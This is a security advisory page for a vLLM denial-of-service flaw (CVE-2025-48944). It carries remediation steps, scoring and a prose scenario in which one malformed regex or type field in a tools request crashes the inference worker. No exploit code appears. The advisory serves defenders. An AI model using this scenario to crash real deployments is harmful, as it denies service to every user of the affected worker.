CVE-2025-48944: vLLM: input validation DoS crashes inference worker
GHSA-vrq3-r879-7m65 MEDIUM PoC AVAILABLE CISA: TRACK*Any authenticated API user can crash a vLLM inference worker with a single malformed tools request, causing service outage until manually restarted. Low-privilege access requirement makes this a realistic insider or compromised-credential threat in multi-tenant LLM deployments. Patch to vLLM 0.9.0 immediately—there is no safe workaround short of disabling tools functionality entirely.
Risk Assessment
Medium-high operational risk despite the CVSS 6.5 score. Attack complexity is low and only low-privilege API credentials are required, making exploitation trivial for any user with API access. The impact is total disruption of the affected inference worker with no automatic recovery—manual intervention required each time. Organizations running vLLM 0.8.x with the tools API exposed face persistent availability risk from any authenticated principal, internal or external.
Affected Systems
Severity & Risk
Attack Surface
Recommended Action
1 step-
1) Upgrade vLLM to 0.9.0 immediately—this is the only complete fix. 2) If patching is blocked, restrict /v1/chat/completions tools functionality to trusted internal principals at the API gateway level, or disable it entirely. 3) Implement automatic worker restart via systemd watchdog, Kubernetes liveness probes, or equivalent to minimize MTTR if exploitation occurs. 4) Add API gateway or WAF rules to validate and reject structurally malformed 'pattern' and 'type' fields in tool definitions before they reach the inference worker. 5) Alert on unexpected vLLM worker process terminations—treat crashes as potential exploitation indicators.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-48944?
Any authenticated API user can crash a vLLM inference worker with a single malformed tools request, causing service outage until manually restarted. Low-privilege access requirement makes this a realistic insider or compromised-credential threat in multi-tenant LLM deployments. Patch to vLLM 0.9.0 immediately—there is no safe workaround short of disabling tools functionality entirely.
Is CVE-2025-48944 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-48944, increasing the risk of exploitation.
How to fix CVE-2025-48944?
1) Upgrade vLLM to 0.9.0 immediately—this is the only complete fix. 2) If patching is blocked, restrict /v1/chat/completions tools functionality to trusted internal principals at the API gateway level, or disable it entirely. 3) Implement automatic worker restart via systemd watchdog, Kubernetes liveness probes, or equivalent to minimize MTTR if exploitation occurs. 4) Add API gateway or WAF rules to validate and reject structurally malformed 'pattern' and 'type' fields in tool definitions before they reach the inference worker. 5) Alert on unexpected vLLM worker process terminations—treat crashes as potential exploitation indicators.
What systems are affected by CVE-2025-48944?
This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, agent frameworks, function-calling pipelines, model serving APIs, RAG pipelines with tool use.
What is the CVSS score for CVE-2025-48944?
CVE-2025-48944 has a CVSS v3.1 base score of 6.5 (MEDIUM). The EPSS exploitation probability is 0.32%.
Technical Details
NVD Description
vLLM is an inference and serving engine for large language models (LLMs). In version 0.8.0 up to but excluding 0.9.0, the vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Version 0.9.0 fixes the issue.
Exploitation Scenario
An attacker with basic API credentials—or a compromised low-privilege service account—sends a single POST request to /v1/chat/completions with a crafted 'tools' array containing a malformed 'pattern' field (e.g., an invalid regex that fails to compile) or a structurally invalid 'type' annotation. The vLLM backend attempts to compile or parse this input without prior validation, triggering an unhandled exception that terminates the inference worker process. The LLM service is fully unavailable until an operator manually restarts the worker. In a shared or multi-tenant LLM platform, a single request denies service to all downstream users of that worker. The attack requires no AI/ML expertise—only knowledge of the OpenAI-compatible tools API schema.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References
Timeline
Related Vulnerabilities
CVE-2024-9053 9.8 vllm: RCE via unsafe pickle deserialization in RPC server
Same package: vllm CVE-2024-11041 9.8 vllm: RCE via unsafe pickle deserialization in MessageQueue
Same package: vllm CVE-2026-25960 9.8 vllm: SSRF allows internal network access
Same package: vllm CVE-2025-47277 9.8 vLLM: RCE via exposed TCPStore in distributed inference
Same package: vllm CVE-2025-32444 9.8 vLLM: RCE via pickle deserialization on ZeroMQ
Same package: vllm
AI Threat Alert